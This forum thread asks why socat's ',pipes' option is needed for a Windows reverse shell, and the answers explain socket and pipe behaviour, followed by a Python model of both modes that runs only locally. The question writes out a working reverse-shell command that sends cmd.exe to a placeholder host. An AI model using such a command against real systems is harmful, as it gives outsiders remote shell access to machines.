
Trying to create a reverse shell, I used this on my Windows box:
socat -d -d TCP4:X.X.X.X:789 EXEC:'cmd.exe'

which failed with the following error: "The process tried to write to a nonexistent pipe."

Using the pipes option, it now works: socat -d -d TCP4:X.X.X.X:789 EXEC:'cmd.exe',pipes

My question is: why is pipes necessary?

I know that the pipes option will use named pipes instead of the default UNIX socket.
I am assuming that the default behavior is different in the Windows implementation.

2 Answers


The pipes option is used to force cmd.exe or PowerShell to use Unix-style standard input and output.

T K
  • 31

I cannot speak to cmd.exe, but I can about bash.exe/sh.exe.

On Windows, the network socket has one file descriptor which doesn't allow read() calls (see https://stackoverflow.com/questions/4778043/winsock-not-supporting-read-write; on my system, though, write() seems to work).

bash.exe inherits that network connection (one file descriptor) and uses write() and read(), which then fail. On Linux this would work; see https://man7.org/linux/man-pages/man2/recv.2.html:

"The only difference between recv() and read(2) is the presence of flags."

Invoked with ,pipes, socat enters a bidirectional copy loop which operates on two unnamed pipes. bash.exe inherits those two artificial pipe ends (file descriptors) and works well, because for pipes you actually can use read() and write().

jifb
  • 121
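To make the difference between the two EXEC modes concrete, here is a toy re-implementation of both in Python. This is an added example and not socat's code: `exec_direct` hands the child the socket itself as stdin/stdout (socat's default, the mode the question reports failing on Windows), while `exec_with_pipes` gives the child two unnamed pipes and runs the copy loop between the socket and those pipes in the parent, which is what `,pipes` does. The "network" is a constructed local `socketpair()` standing in for `TCP4:X.X.X.X:789`, the child is `sh` rather than cmd.exe, and the whole thing assumes Linux/POSIX, where, as the answer above notes, both modes work.

```python
"""Toy model of socat EXEC:'...' versus EXEC:'...',pipes (added example, not socat code).
Assumes a POSIX system; the 'network' is a local socketpair() standing in for TCP."""
import os
import selectors
import socket
import subprocess
import threading

CHUNK = 4096


def exec_direct(argv, sock):
    """Default EXEC: the child inherits the socket itself as stdin/stdout, so every
    read()/write() the child performs is done directly on the socket descriptor."""
    fd = sock.fileno()
    return subprocess.Popen(argv, stdin=fd, stdout=fd, stderr=subprocess.STDOUT)


def _write_all(fd, data):
    """os.write() may write only part of a buffer; loop until it is all out."""
    while data:
        n = os.write(fd, data)
        data = data[n:]


def relay(sock, child):
    """EXEC:...,pipes: the child only ever sees two unnamed pipes. This loop is the
    parent's (socat's) job: copy socket -> child stdin and child stdout -> socket."""
    in_fd, out_fd = child.stdin.fileno(), child.stdout.fileno()
    sel = selectors.DefaultSelector()
    sel.register(sock, selectors.EVENT_READ, "net")
    sel.register(out_fd, selectors.EVENT_READ, "child")
    while True:
        for key, _ in sel.select():
            if key.data == "net":
                data = sock.recv(CHUNK)          # recv(), not read(): this is the socket
                if data:
                    try:
                        _write_all(in_fd, data)  # plain write() on the pipe end
                        continue
                    except BrokenPipeError:
                        pass                     # child already gone: treat as EOF
                sel.unregister(sock)
                child.stdin.close()              # propagate EOF to the child
            else:
                data = os.read(out_fd, CHUNK)    # plain read() on the pipe end
                if data:
                    sock.sendall(data)
                    continue
                try:
                    sock.shutdown(socket.SHUT_WR)  # child finished: EOF towards the network
                except OSError:
                    pass
                sel.close()
                return


def exec_with_pipes(argv, sock):
    """Spawn the child with pipes for stdin/stdout and start the copy loop."""
    child = subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)
    pump = threading.Thread(target=relay, args=(sock, child), daemon=True)
    pump.start()
    return child, pump


def run_session(script, mode):
    """Play the remote side: push `script` to the child's stdin over the 'network'
    and return everything the child wrote back. mode is 'direct' or 'pipes'."""
    remote, local = socket.socketpair()  # constructed stand-in for TCP4:X.X.X.X:789
    if mode == "pipes":
        child, pump = exec_with_pipes(["sh"], local)
    else:
        child, pump = exec_direct(["sh"], local), None
        local.close()                    # the child holds its own copy of the socket
    remote.sendall(script)
    remote.shutdown(socket.SHUT_WR)      # EOF on stdin makes sh exit after the script
    out = bytearray()
    while chunk := remote.recv(CHUNK):
        out += chunk
    child.wait()
    if pump is not None:
        pump.join()
        local.close()
    remote.close()
    return bytes(out)


if __name__ == "__main__":
    for mode in ("direct", "pipes"):
        print(mode, run_session(b"echo hello\n", mode))
```

On Linux both modes return the same output, which is exactly the answer's point: the child does not care whether fd 0/1 are a socket or a pipe, because `read()`/`write()` work on both. On Windows only the `pipes` path would work, since there the child ends up with a socket handle it cannot `read()` from, and the relay in `relay()` is what spares it from ever touching that handle.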